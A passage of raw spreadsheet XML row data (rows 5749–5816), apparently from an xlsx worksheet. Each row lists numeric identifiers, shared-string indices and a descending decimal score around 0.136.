      </c>
      <c r="D5749" s="2">
        <v>1.0</v>
      </c>
      <c r="E5749" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5749" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="5750" ht="15.75" customHeight="1">
      <c r="A5750" s="1">
        <v>29484.0</v>
      </c>
      <c r="B5750" s="2">
        <v>3.2469301E7</v>
      </c>
      <c r="C5750" s="2" t="s">
        <v>5486</v>
      </c>
      <c r="D5750" s="2">
        <v>1.0</v>
      </c>
      <c r="E5750" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5750" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="5751" ht="15.75" customHeight="1">
      <c r="A5751" s="1">
        <v>31281.0</v>
      </c>
      <c r="B5751" s="2">
        <v>4960458.0</v>
      </c>
      <c r="C5751" s="2" t="s">
        <v>5487</v>
      </c>
      <c r="D5751" s="2">
        <v>1.0</v>
      </c>
      <c r="E5751" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5751" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="5752" ht="15.75" customHeight="1">
      <c r="A5752" s="1">
        <v>20606.0</v>
      </c>
      <c r="B5752" s="2">
        <v>1.3905923E7</v>
      </c>
      <c r="C5752" s="2" t="s">
        <v>5488</v>
      </c>
      <c r="D5752" s="2">
        <v>1.0</v>
      </c>
      <c r="E5752" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5752" s="2">
        <v>0.13681592039801</v>
      </c>
    </row>
    <row r="5753" ht="15.75" customHeight="1">
      <c r="A5753" s="1">
        <v>20607.0</v>
      </c>
      <c r="B5753" s="2">
        <v>1.3906138E7</v>
      </c>
      <c r="C5753" s="2" t="s">
        <v>5488</v>
      </c>
      <c r="D5753" s="2">
        <v>1.0</v>
      </c>
      <c r="E5753" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5753" s="2">
        <v>0.13681592039801</v>
      </c>
    </row>
    <row r="5754" ht="15.75" customHeight="1">
      <c r="A5754" s="1">
        <v>22508.0</v>
      </c>
      <c r="B5754" s="2">
        <v>3.7402449E7</v>
      </c>
      <c r="C5754" s="2" t="s">
        <v>5489</v>
      </c>
      <c r="D5754" s="2">
        <v>1.0</v>
      </c>
      <c r="E5754" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5754" s="2">
        <v>0.1366843033509701</v>
      </c>
    </row>
    <row r="5755" ht="15.75" customHeight="1">
      <c r="A5755" s="1">
        <v>29719.0</v>
      </c>
      <c r="B5755" s="2">
        <v>3.4436822E7</v>
      </c>
      <c r="C5755" s="2" t="s">
        <v>5490</v>
      </c>
      <c r="D5755" s="2">
        <v>1.0</v>
      </c>
      <c r="E5755" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5755" s="2">
        <v>0.1366843033509701</v>
      </c>
    </row>
    <row r="5756" ht="15.75" customHeight="1">
      <c r="A5756" s="1">
        <v>30801.0</v>
      </c>
      <c r="B5756" s="2">
        <v>4.5216853E7</v>
      </c>
      <c r="C5756" s="2" t="s">
        <v>5377</v>
      </c>
      <c r="D5756" s="2">
        <v>1.0</v>
      </c>
      <c r="E5756" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5756" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="5757" ht="15.75" customHeight="1">
      <c r="A5757" s="1">
        <v>31177.0</v>
      </c>
      <c r="B5757" s="2">
        <v>4913043.0</v>
      </c>
      <c r="C5757" s="2" t="s">
        <v>5491</v>
      </c>
      <c r="D5757" s="2">
        <v>1.0</v>
      </c>
      <c r="E5757" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5757" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="5758" ht="15.75" customHeight="1">
      <c r="A5758" s="1">
        <v>31835.0</v>
      </c>
      <c r="B5758" s="2">
        <v>5265611.0</v>
      </c>
      <c r="C5758" s="2" t="s">
        <v>5492</v>
      </c>
      <c r="D5758" s="2">
        <v>1.0</v>
      </c>
      <c r="E5758" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5758" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="5759" ht="15.75" customHeight="1">
      <c r="A5759" s="1">
        <v>34069.0</v>
      </c>
      <c r="B5759" s="2">
        <v>9645204.0</v>
      </c>
      <c r="C5759" s="2" t="s">
        <v>5493</v>
      </c>
      <c r="D5759" s="2">
        <v>1.0</v>
      </c>
      <c r="E5759" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5759" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="5760" ht="15.75" customHeight="1">
      <c r="A5760" s="1">
        <v>17474.0</v>
      </c>
      <c r="B5760" s="2">
        <v>4.99201E7</v>
      </c>
      <c r="C5760" s="2" t="s">
        <v>5494</v>
      </c>
      <c r="D5760" s="2">
        <v>1.0</v>
      </c>
      <c r="E5760" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5760" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="5761" ht="15.75" customHeight="1">
      <c r="A5761" s="1">
        <v>28724.0</v>
      </c>
      <c r="B5761" s="2">
        <v>2.7918738E7</v>
      </c>
      <c r="C5761" s="2" t="s">
        <v>5495</v>
      </c>
      <c r="D5761" s="2">
        <v>1.0</v>
      </c>
      <c r="E5761" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5761" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="5762" ht="15.75" customHeight="1">
      <c r="A5762" s="1">
        <v>29812.0</v>
      </c>
      <c r="B5762" s="2">
        <v>3.5201697E7</v>
      </c>
      <c r="C5762" s="2" t="s">
        <v>5496</v>
      </c>
      <c r="D5762" s="2">
        <v>1.0</v>
      </c>
      <c r="E5762" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5762" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="5763" ht="15.75" customHeight="1">
      <c r="A5763" s="1">
        <v>32354.0</v>
      </c>
      <c r="B5763" s="2">
        <v>5.5932823E7</v>
      </c>
      <c r="C5763" s="2" t="s">
        <v>5497</v>
      </c>
      <c r="D5763" s="2">
        <v>1.0</v>
      </c>
      <c r="E5763" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5763" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="5764" ht="15.75" customHeight="1">
      <c r="A5764" s="1">
        <v>33768.0</v>
      </c>
      <c r="B5764" s="2">
        <v>8661324.0</v>
      </c>
      <c r="C5764" s="2" t="s">
        <v>5498</v>
      </c>
      <c r="D5764" s="2">
        <v>1.0</v>
      </c>
      <c r="E5764" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5764" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="5765" ht="15.75" customHeight="1">
      <c r="A5765" s="1">
        <v>20575.0</v>
      </c>
      <c r="B5765" s="2">
        <v>1.3631144E7</v>
      </c>
      <c r="C5765" s="2" t="s">
        <v>5499</v>
      </c>
      <c r="D5765" s="2">
        <v>1.0</v>
      </c>
      <c r="E5765" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5765" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="5766" ht="15.75" customHeight="1">
      <c r="A5766" s="1">
        <v>30844.0</v>
      </c>
      <c r="B5766" s="2">
        <v>4.5839086E7</v>
      </c>
      <c r="C5766" s="2" t="s">
        <v>5500</v>
      </c>
      <c r="D5766" s="2">
        <v>1.0</v>
      </c>
      <c r="E5766" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5766" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="5767" ht="15.75" customHeight="1">
      <c r="A5767" s="1">
        <v>32055.0</v>
      </c>
      <c r="B5767" s="2">
        <v>5.3766124E7</v>
      </c>
      <c r="C5767" s="2" t="s">
        <v>5501</v>
      </c>
      <c r="D5767" s="2">
        <v>1.0</v>
      </c>
      <c r="E5767" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5767" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="5768" ht="15.75" customHeight="1">
      <c r="A5768" s="1">
        <v>33680.0</v>
      </c>
      <c r="B5768" s="2">
        <v>8428717.0</v>
      </c>
      <c r="C5768" s="2" t="s">
        <v>5502</v>
      </c>
      <c r="D5768" s="2">
        <v>1.0</v>
      </c>
      <c r="E5768" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5768" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="5769" ht="15.75" customHeight="1">
      <c r="A5769" s="1">
        <v>18526.0</v>
      </c>
      <c r="B5769" s="2">
        <v>5.3029974E7</v>
      </c>
      <c r="C5769" s="2" t="s">
        <v>5503</v>
      </c>
      <c r="D5769" s="2">
        <v>1.0</v>
      </c>
      <c r="E5769" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5769" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="5770" ht="15.75" customHeight="1">
      <c r="A5770" s="1">
        <v>19005.0</v>
      </c>
      <c r="B5770" s="2">
        <v>5.4478586E7</v>
      </c>
      <c r="C5770" s="2" t="s">
        <v>5504</v>
      </c>
      <c r="D5770" s="2">
        <v>1.0</v>
      </c>
      <c r="E5770" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5770" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="5771" ht="15.75" customHeight="1">
      <c r="A5771" s="1">
        <v>20958.0</v>
      </c>
      <c r="B5771" s="2">
        <v>1.6666313E7</v>
      </c>
      <c r="C5771" s="2" t="s">
        <v>5505</v>
      </c>
      <c r="D5771" s="2">
        <v>1.0</v>
      </c>
      <c r="E5771" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5771" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="5772" ht="15.75" customHeight="1">
      <c r="A5772" s="1">
        <v>21538.0</v>
      </c>
      <c r="B5772" s="2">
        <v>2.3517649E7</v>
      </c>
      <c r="C5772" s="2" t="s">
        <v>5506</v>
      </c>
      <c r="D5772" s="2">
        <v>1.0</v>
      </c>
      <c r="E5772" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5772" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="5773" ht="15.75" customHeight="1">
      <c r="A5773" s="1">
        <v>22502.0</v>
      </c>
      <c r="B5773" s="2">
        <v>3.7281186E7</v>
      </c>
      <c r="C5773" s="2" t="s">
        <v>5507</v>
      </c>
      <c r="D5773" s="2">
        <v>1.0</v>
      </c>
      <c r="E5773" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5773" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="5774" ht="15.75" customHeight="1">
      <c r="A5774" s="1">
        <v>24462.0</v>
      </c>
      <c r="B5774" s="2">
        <v>1.0949517E7</v>
      </c>
      <c r="C5774" s="2" t="s">
        <v>5508</v>
      </c>
      <c r="D5774" s="2">
        <v>1.0</v>
      </c>
      <c r="E5774" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5774" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="5775" ht="15.75" customHeight="1">
      <c r="A5775" s="1">
        <v>25338.0</v>
      </c>
      <c r="B5775" s="2">
        <v>1.3523898E7</v>
      </c>
      <c r="C5775" s="2" t="s">
        <v>5509</v>
      </c>
      <c r="D5775" s="2">
        <v>1.0</v>
      </c>
      <c r="E5775" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5775" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="5776" ht="15.75" customHeight="1">
      <c r="A5776" s="1">
        <v>26263.0</v>
      </c>
      <c r="B5776" s="2">
        <v>1.6377141E7</v>
      </c>
      <c r="C5776" s="2" t="s">
        <v>5510</v>
      </c>
      <c r="D5776" s="2">
        <v>1.0</v>
      </c>
      <c r="E5776" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5776" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="5777" ht="15.75" customHeight="1">
      <c r="A5777" s="1">
        <v>26574.0</v>
      </c>
      <c r="B5777" s="2">
        <v>1.7890298E7</v>
      </c>
      <c r="C5777" s="2" t="s">
        <v>5511</v>
      </c>
      <c r="D5777" s="2">
        <v>1.0</v>
      </c>
      <c r="E5777" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5777" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="5778" ht="15.75" customHeight="1">
      <c r="A5778" s="1">
        <v>28205.0</v>
      </c>
      <c r="B5778" s="2">
        <v>2.501774E7</v>
      </c>
      <c r="C5778" s="2" t="s">
        <v>5512</v>
      </c>
      <c r="D5778" s="2">
        <v>1.0</v>
      </c>
      <c r="E5778" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5778" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="5779" ht="15.75" customHeight="1">
      <c r="A5779" s="1">
        <v>28560.0</v>
      </c>
      <c r="B5779" s="2">
        <v>2.6881007E7</v>
      </c>
      <c r="C5779" s="2" t="s">
        <v>5513</v>
      </c>
      <c r="D5779" s="2">
        <v>1.0</v>
      </c>
      <c r="E5779" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5779" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="5780" ht="15.75" customHeight="1">
      <c r="A5780" s="1">
        <v>30373.0</v>
      </c>
      <c r="B5780" s="2">
        <v>3.8440201E7</v>
      </c>
      <c r="C5780" s="2" t="s">
        <v>5514</v>
      </c>
      <c r="D5780" s="2">
        <v>1.0</v>
      </c>
      <c r="E5780" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5780" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="5781" ht="15.75" customHeight="1">
      <c r="A5781" s="1">
        <v>30920.0</v>
      </c>
      <c r="B5781" s="2">
        <v>4.6842533E7</v>
      </c>
      <c r="C5781" s="2" t="s">
        <v>5515</v>
      </c>
      <c r="D5781" s="2">
        <v>1.0</v>
      </c>
      <c r="E5781" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5781" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="5782" ht="15.75" customHeight="1">
      <c r="A5782" s="1">
        <v>31006.0</v>
      </c>
      <c r="B5782" s="2">
        <v>4.7680875E7</v>
      </c>
      <c r="C5782" s="2" t="s">
        <v>5516</v>
      </c>
      <c r="D5782" s="2">
        <v>1.0</v>
      </c>
      <c r="E5782" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5782" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="5783" ht="15.75" customHeight="1">
      <c r="A5783" s="1">
        <v>32260.0</v>
      </c>
      <c r="B5783" s="2">
        <v>5511685.0</v>
      </c>
      <c r="C5783" s="2" t="s">
        <v>5517</v>
      </c>
      <c r="D5783" s="2">
        <v>1.0</v>
      </c>
      <c r="E5783" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5783" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="5784" ht="15.75" customHeight="1">
      <c r="A5784" s="1">
        <v>33400.0</v>
      </c>
      <c r="B5784" s="2">
        <v>7713346.0</v>
      </c>
      <c r="C5784" s="2" t="s">
        <v>5518</v>
      </c>
      <c r="D5784" s="2">
        <v>1.0</v>
      </c>
      <c r="E5784" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5784" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="5785" ht="15.75" customHeight="1">
      <c r="A5785" s="1">
        <v>33525.0</v>
      </c>
      <c r="B5785" s="2">
        <v>8114709.0</v>
      </c>
      <c r="C5785" s="2" t="s">
        <v>5519</v>
      </c>
      <c r="D5785" s="2">
        <v>1.0</v>
      </c>
      <c r="E5785" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5785" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="5786" ht="15.75" customHeight="1">
      <c r="A5786" s="1">
        <v>29286.0</v>
      </c>
      <c r="B5786" s="2">
        <v>3.1076028E7</v>
      </c>
      <c r="C5786" s="2" t="s">
        <v>5520</v>
      </c>
      <c r="D5786" s="2">
        <v>1.0</v>
      </c>
      <c r="E5786" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5786" s="2">
        <v>0.1360708534621579</v>
      </c>
    </row>
    <row r="5787" ht="15.75" customHeight="1">
      <c r="A5787" s="1">
        <v>29294.0</v>
      </c>
      <c r="B5787" s="2">
        <v>3.1201104E7</v>
      </c>
      <c r="C5787" s="2" t="s">
        <v>5521</v>
      </c>
      <c r="D5787" s="2">
        <v>1.0</v>
      </c>
      <c r="E5787" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5787" s="2">
        <v>0.1360708534621579</v>
      </c>
    </row>
    <row r="5788" ht="15.75" customHeight="1">
      <c r="A5788" s="1">
        <v>21097.0</v>
      </c>
      <c r="B5788" s="2">
        <v>1.8076643E7</v>
      </c>
      <c r="C5788" s="2" t="s">
        <v>5522</v>
      </c>
      <c r="D5788" s="2">
        <v>1.0</v>
      </c>
      <c r="E5788" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5788" s="2">
        <v>0.1359126984126985</v>
      </c>
    </row>
    <row r="5789" ht="15.75" customHeight="1">
      <c r="A5789" s="1">
        <v>21375.0</v>
      </c>
      <c r="B5789" s="2">
        <v>2.1641694E7</v>
      </c>
      <c r="C5789" s="2" t="s">
        <v>5523</v>
      </c>
      <c r="D5789" s="2">
        <v>1.0</v>
      </c>
      <c r="E5789" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5789" s="2">
        <v>0.1359126984126984</v>
      </c>
    </row>
    <row r="5790" ht="15.75" customHeight="1">
      <c r="A5790" s="1">
        <v>28085.0</v>
      </c>
      <c r="B5790" s="2">
        <v>2.46365E7</v>
      </c>
      <c r="C5790" s="2" t="s">
        <v>5524</v>
      </c>
      <c r="D5790" s="2">
        <v>1.0</v>
      </c>
      <c r="E5790" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5790" s="2">
        <v>0.1358974358974359</v>
      </c>
    </row>
    <row r="5791" ht="15.75" customHeight="1">
      <c r="A5791" s="1">
        <v>20242.0</v>
      </c>
      <c r="B5791" s="2">
        <v>1.0927937E7</v>
      </c>
      <c r="C5791" s="2" t="s">
        <v>5525</v>
      </c>
      <c r="D5791" s="2">
        <v>1.0</v>
      </c>
      <c r="E5791" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5791" s="2">
        <v>0.1357012750455374</v>
      </c>
    </row>
    <row r="5792" ht="15.75" customHeight="1">
      <c r="A5792" s="1">
        <v>30650.0</v>
      </c>
      <c r="B5792" s="2">
        <v>4.1819666E7</v>
      </c>
      <c r="C5792" s="2" t="s">
        <v>5526</v>
      </c>
      <c r="D5792" s="2">
        <v>1.0</v>
      </c>
      <c r="E5792" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5792" s="2">
        <v>0.1355218855218856</v>
      </c>
    </row>
    <row r="5793" ht="15.75" customHeight="1">
      <c r="A5793" s="1">
        <v>29630.0</v>
      </c>
      <c r="B5793" s="2">
        <v>3.3714432E7</v>
      </c>
      <c r="C5793" s="2" t="s">
        <v>5527</v>
      </c>
      <c r="D5793" s="2">
        <v>1.0</v>
      </c>
      <c r="E5793" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5793" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="5794" ht="15.75" customHeight="1">
      <c r="A5794" s="1">
        <v>19301.0</v>
      </c>
      <c r="B5794" s="2">
        <v>5.5220001E7</v>
      </c>
      <c r="C5794" s="2" t="s">
        <v>5528</v>
      </c>
      <c r="D5794" s="2">
        <v>1.0</v>
      </c>
      <c r="E5794" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5794" s="2">
        <v>0.1353046594982079</v>
      </c>
    </row>
    <row r="5795" ht="15.75" customHeight="1">
      <c r="A5795" s="1">
        <v>23715.0</v>
      </c>
      <c r="B5795" s="2">
        <v>7196714.0</v>
      </c>
      <c r="C5795" s="2" t="s">
        <v>5529</v>
      </c>
      <c r="D5795" s="2">
        <v>1.0</v>
      </c>
      <c r="E5795" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5795" s="2">
        <v>0.1353046594982079</v>
      </c>
    </row>
    <row r="5796" ht="15.75" customHeight="1">
      <c r="A5796" s="1">
        <v>11948.0</v>
      </c>
      <c r="B5796" s="2">
        <v>2.5559167E7</v>
      </c>
      <c r="C5796" s="2" t="s">
        <v>5530</v>
      </c>
      <c r="D5796" s="2">
        <v>1.0</v>
      </c>
      <c r="E5796" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5796" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="5797" ht="15.75" customHeight="1">
      <c r="A5797" s="1">
        <v>20255.0</v>
      </c>
      <c r="B5797" s="2">
        <v>1.1024232E7</v>
      </c>
      <c r="C5797" s="2" t="s">
        <v>5531</v>
      </c>
      <c r="D5797" s="2">
        <v>1.0</v>
      </c>
      <c r="E5797" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5797" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="5798" ht="15.75" customHeight="1">
      <c r="A5798" s="1">
        <v>20644.0</v>
      </c>
      <c r="B5798" s="2">
        <v>1.4222298E7</v>
      </c>
      <c r="C5798" s="2" t="s">
        <v>5532</v>
      </c>
      <c r="D5798" s="2">
        <v>1.0</v>
      </c>
      <c r="E5798" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5798" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="5799" ht="15.75" customHeight="1">
      <c r="A5799" s="1">
        <v>22701.0</v>
      </c>
      <c r="B5799" s="2">
        <v>4254877.0</v>
      </c>
      <c r="C5799" s="2" t="s">
        <v>5533</v>
      </c>
      <c r="D5799" s="2">
        <v>1.0</v>
      </c>
      <c r="E5799" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5799" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="5800" ht="15.75" customHeight="1">
      <c r="A5800" s="1">
        <v>25327.0</v>
      </c>
      <c r="B5800" s="2">
        <v>1.3471365E7</v>
      </c>
      <c r="C5800" s="2" t="s">
        <v>5534</v>
      </c>
      <c r="D5800" s="2">
        <v>1.0</v>
      </c>
      <c r="E5800" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5800" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="5801" ht="15.75" customHeight="1">
      <c r="A5801" s="1">
        <v>29052.0</v>
      </c>
      <c r="B5801" s="2">
        <v>3.0235337E7</v>
      </c>
      <c r="C5801" s="2" t="s">
        <v>5535</v>
      </c>
      <c r="D5801" s="2">
        <v>1.0</v>
      </c>
      <c r="E5801" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5801" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="5802" ht="15.75" customHeight="1">
      <c r="A5802" s="1">
        <v>29296.0</v>
      </c>
      <c r="B5802" s="2">
        <v>3.1201294E7</v>
      </c>
      <c r="C5802" s="2" t="s">
        <v>5536</v>
      </c>
      <c r="D5802" s="2">
        <v>1.0</v>
      </c>
      <c r="E5802" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5802" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="5803" ht="15.75" customHeight="1">
      <c r="A5803" s="1">
        <v>30688.0</v>
      </c>
      <c r="B5803" s="2">
        <v>4254876.0</v>
      </c>
      <c r="C5803" s="2" t="s">
        <v>5537</v>
      </c>
      <c r="D5803" s="2">
        <v>1.0</v>
      </c>
      <c r="E5803" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5803" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="5804" ht="15.75" customHeight="1">
      <c r="A5804" s="1">
        <v>31939.0</v>
      </c>
      <c r="B5804" s="2">
        <v>5.3074114E7</v>
      </c>
      <c r="C5804" s="2" t="s">
        <v>5538</v>
      </c>
      <c r="D5804" s="2">
        <v>1.0</v>
      </c>
      <c r="E5804" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5804" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="5805" ht="15.75" customHeight="1">
      <c r="A5805" s="1">
        <v>31987.0</v>
      </c>
      <c r="B5805" s="2">
        <v>5328817.0</v>
      </c>
      <c r="C5805" s="2" t="s">
        <v>5539</v>
      </c>
      <c r="D5805" s="2">
        <v>1.0</v>
      </c>
      <c r="E5805" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5805" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="5806" ht="15.75" customHeight="1">
      <c r="A5806" s="1">
        <v>22181.0</v>
      </c>
      <c r="B5806" s="2">
        <v>3.1720745E7</v>
      </c>
      <c r="C5806" s="2" t="s">
        <v>5540</v>
      </c>
      <c r="D5806" s="2">
        <v>1.0</v>
      </c>
      <c r="E5806" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5806" s="2">
        <v>0.1350574712643679</v>
      </c>
    </row>
    <row r="5807" ht="15.75" customHeight="1">
      <c r="A5807" s="1">
        <v>8358.0</v>
      </c>
      <c r="B5807" s="2">
        <v>5.3758737E7</v>
      </c>
      <c r="C5807" s="2" t="s">
        <v>5541</v>
      </c>
      <c r="D5807" s="2">
        <v>1.0</v>
      </c>
      <c r="E5807" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5807" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="5808" ht="15.75" customHeight="1">
      <c r="A5808" s="1">
        <v>23180.0</v>
      </c>
      <c r="B5808" s="2">
        <v>5220515.0</v>
      </c>
      <c r="C5808" s="2" t="s">
        <v>5542</v>
      </c>
      <c r="D5808" s="2">
        <v>1.0</v>
      </c>
      <c r="E5808" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5808" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="5809" ht="15.75" customHeight="1">
      <c r="A5809" s="1">
        <v>23250.0</v>
      </c>
      <c r="B5809" s="2">
        <v>5.3098273E7</v>
      </c>
      <c r="C5809" s="2" t="s">
        <v>5543</v>
      </c>
      <c r="D5809" s="2">
        <v>1.0</v>
      </c>
      <c r="E5809" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5809" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="5810" ht="15.75" customHeight="1">
      <c r="A5810" s="1">
        <v>28389.0</v>
      </c>
      <c r="B5810" s="2">
        <v>2.6140214E7</v>
      </c>
      <c r="C5810" s="2" t="s">
        <v>5544</v>
      </c>
      <c r="D5810" s="2">
        <v>1.0</v>
      </c>
      <c r="E5810" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5810" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="5811" ht="15.75" customHeight="1">
      <c r="A5811" s="1">
        <v>23591.0</v>
      </c>
      <c r="B5811" s="2">
        <v>6346364.0</v>
      </c>
      <c r="C5811" s="2" t="s">
        <v>5545</v>
      </c>
      <c r="D5811" s="2">
        <v>1.0</v>
      </c>
      <c r="E5811" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5811" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="5812" ht="15.75" customHeight="1">
      <c r="A5812" s="1">
        <v>26809.0</v>
      </c>
      <c r="B5812" s="2">
        <v>1.8729914E7</v>
      </c>
      <c r="C5812" s="2" t="s">
        <v>5546</v>
      </c>
      <c r="D5812" s="2">
        <v>1.0</v>
      </c>
      <c r="E5812" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5812" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="5813" ht="15.75" customHeight="1">
      <c r="A5813" s="1">
        <v>31540.0</v>
      </c>
      <c r="B5813" s="2">
        <v>5.0966355E7</v>
      </c>
      <c r="C5813" s="2" t="s">
        <v>5547</v>
      </c>
      <c r="D5813" s="2">
        <v>1.0</v>
      </c>
      <c r="E5813" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5813" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="5814" ht="15.75" customHeight="1">
      <c r="A5814" s="1">
        <v>32883.0</v>
      </c>
      <c r="B5814" s="2">
        <v>6346363.0</v>
      </c>
      <c r="C5814" s="2" t="s">
        <v>5545</v>
      </c>
      <c r="D5814" s="2">
        <v>1.0</v>
      </c>
      <c r="E5814" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5814" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="5815" ht="15.75" customHeight="1">
      <c r="A5815" s="1">
        <v>24883.0</v>
      </c>
      <c r="B5815" s="2">
        <v>1.2236108E7</v>
      </c>
      <c r="C5815" s="2" t="s">
        <v>5548</v>
      </c>
      <c r="D5815" s="2">
        <v>1.0</v>
      </c>
      <c r="E5815" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5815" s="2">
        <v>0.1344605475040258</v>
      </c>
    </row>
    <row r="5816" ht="15.75" customHeight="1">
      <c r="A5816" s="1">
        <v>5853.0</v>
      </c>
      <c r="B5816" s="2">
        <v>4.6940912E7</v>
      </c>
      <c r="C5816" s="2" t="s">
        <v>5549</v>
      </c>
      <c r="D5816" s="2">
